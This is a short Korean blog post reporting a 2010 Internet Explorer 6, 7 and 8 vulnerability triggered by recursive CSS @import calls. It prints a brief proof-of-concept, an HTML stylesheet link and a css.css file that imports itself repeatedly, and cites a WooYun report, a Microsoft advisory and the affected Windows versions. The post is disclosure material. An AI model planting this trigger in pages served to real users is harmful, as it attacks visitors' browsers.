반응형
마이크로소프트(Microsoft)사의 Internet Explorer의 새로운 취약점이 발견 되었다.
해당 취약점은 CSS를 4번이상 호출 시 문제가 생기는 것으로 보여진다.
IE6, IE7, IE8 모두 취약점이 존재하니~ 당분간 자주 털리는(?) 사이트는 가지 않는 것이 안전하니~
엄한 인터넷은 자제^^
자세한 내용은 밑의 링크를 통해 알아보시길^^
- POC 코드(이 코드로 인하여 블로그가 구글 또는 IE8에서 악성으로 탐지 될 수 있습니다^^)
|
<code> |
<div style="position: absolute; top: -999px;left: -999px;"> |
<link href="css.css" rel="stylesheet" type="text/css" /> |
</code> |
<code of css.css> |
*{ |
color:red; |
} |
@import url("css.css"); |
@import url("css.css"); |
@import url("css.css"); |
@import url("css.css"); |
</code> |
http://www.wooyun.org/bugs/wooyun-2010-0885 |
WooYun is a connection platform for vendors and security researchers |
EDB: |
Dec 22, 2010 - Microsoft releases security advisory for this vulnerability: |
http://www.microsoft.com/technet/security/advisory/2488013.mspx |
<영향받는 소프트웨어>
- Internet Explorer 6
Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
- Internet Explorer 7
Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
Windows Vista Service Pack 1 and Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
- Internet Explorer 8
Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Vista Service Pack 1 and Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems
Windows Server 2008 R2 for Itanium-based Systems
댓글